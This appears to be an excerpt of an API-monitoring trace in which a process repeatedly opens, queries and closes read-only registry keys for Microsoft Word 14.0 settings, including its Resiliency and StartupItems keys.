[0086.601] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.601] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3b4) returned 0x0
[0086.601] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.601] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3b4) returned 0x0
[0086.601] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.601] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3b4) returned 0x0
[0086.601] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.601] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3b4) returned 0x0
[0086.601] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.601] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3b4) returned 0x0
[0086.601] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.602] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3b4) returned 0x0
[0086.602] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.602] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3b4) returned 0x0
[0086.602] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.602] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3b4) returned 0x0
[0086.602] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.602] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3b4) returned 0x0
[0086.602] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.602] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81ca08 | out: phkResult=0x1c81ca08*=0x3b4) returned 0x0
[0086.602] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.602] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c928 | out: phkResult=0x1c81c928*=0x3b4) returned 0x0
[0086.602] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.602] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c948 | out: phkResult=0x1c81c948*=0x3b4) returned 0x0
[0086.602] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.603] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x0) returned 0x2
[0086.603] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.603] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3b4) returned 0x0
[0086.603] RegQueryInfoKeyW (in: hKey=0x3b4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.603] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3e4) returned 0x0
[0086.603] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.603] RegQueryInfoKeyW (in: hKey=0x3e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.603] RegOpenKeyExW (in: hKey=0x3e4, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3b4) returned 0x0
[0086.603] RegCloseKey (hKey=0x3e4) returned 0x0
[0086.603] RegQueryInfoKeyW (in: hKey=0x3b4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.603] RegOpenKeyExW (in: hKey=0x3b4, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3e4) returned 0x0
[0086.603] RegCloseKey (hKey=0x3b4) returned 0x0
[0086.604] RegQueryInfoKeyW (in: hKey=0x3e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.604] RegOpenKeyExW (in: hKey=0x3e4, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3b4) returned 0x0
[0086.604] RegCloseKey (hKey=0x3e4) returned 0x0
[0086.604] RegQueryInfoKeyW (in: hKey=0x3b4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.604] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x0) returned 0x2
[0086.604] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.604] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3e4) returned 0x0
[0086.604] RegQueryInfoKeyW (in: hKey=0x3e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.604] RegOpenKeyExW (in: hKey=0x3e4, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3b8) returned 0x0
[0086.604] RegCloseKey (hKey=0x3e4) returned 0x0
[0086.604] RegQueryInfoKeyW (in: hKey=0x3b8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.604] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3e4) returned 0x0
[0086.604] RegCloseKey (hKey=0x3b8) returned 0x0
[0086.604] RegQueryInfoKeyW (in: hKey=0x3e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.605] RegOpenKeyExW (in: hKey=0x3e4, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3b8) returned 0x0
[0086.605] RegCloseKey (hKey=0x3e4) returned 0x0
[0086.605] RegQueryInfoKeyW (in: hKey=0x3b8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.605] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3e4) returned 0x0
[0086.605] RegCloseKey (hKey=0x3b8) returned 0x0
[0086.605] RegQueryInfoKeyW (in: hKey=0x3e4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.605] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x0) returned 0x2
[0086.605] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.605] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x0) returned 0x2
[0086.605] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.605] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3b8) returned 0x0
[0086.605] RegQueryInfoKeyW (in: hKey=0x3b8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.605] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3bc) returned 0x0
[0086.605] RegCloseKey (hKey=0x3b8) returned 0x0
[0086.605] RegQueryInfoKeyW (in: hKey=0x3bc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.606] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3b8) returned 0x0
[0086.606] RegCloseKey (hKey=0x3bc) returned 0x0
[0086.606] RegQueryInfoKeyW (in: hKey=0x3b8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.606] RegOpenKeyExW (in: hKey=0x3b8, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3bc) returned 0x0
[0086.606] RegCloseKey (hKey=0x3b8) returned 0x0
[0086.606] RegQueryInfoKeyW (in: hKey=0x3bc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.606] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c7f8 | out: phkResult=0x1c81c7f8*=0x3b8) returned 0x0
[0086.606] RegCloseKey (hKey=0x3bc) returned 0x0
[0086.606] RegQueryInfoKeyW (in: hKey=0x3b8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c71c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c71c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c718*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.606] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x0) returned 0x2
[0086.606] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.606] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3bc) returned 0x0
[0086.606] RegQueryInfoKeyW (in: hKey=0x3bc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.606] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3e8) returned 0x0
[0086.606] RegCloseKey (hKey=0x3bc) returned 0x0
[0086.607] RegQueryInfoKeyW (in: hKey=0x3e8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.607] RegOpenKeyExW (in: hKey=0x3e8, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3bc) returned 0x0
[0086.607] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.607] RegQueryInfoKeyW (in: hKey=0x3bc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.607] RegOpenKeyExW (in: hKey=0x3bc, lpSubKey="14.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3e8) returned 0x0
[0086.607] RegCloseKey (hKey=0x3bc) returned 0x0
[0086.607] RegQueryInfoKeyW (in: hKey=0x3e8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.607] RegOpenKeyExW (in: hKey=0x3e8, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x3bc) returned 0x0
[0086.607] RegCloseKey (hKey=0x3e8) returned 0x0
[0086.607] RegQueryInfoKeyW (in: hKey=0x3bc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.607] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8d8 | out: phkResult=0x1c81c8d8*=0x0) returned 0x2
[0086.607] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c7fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c7fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c7f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
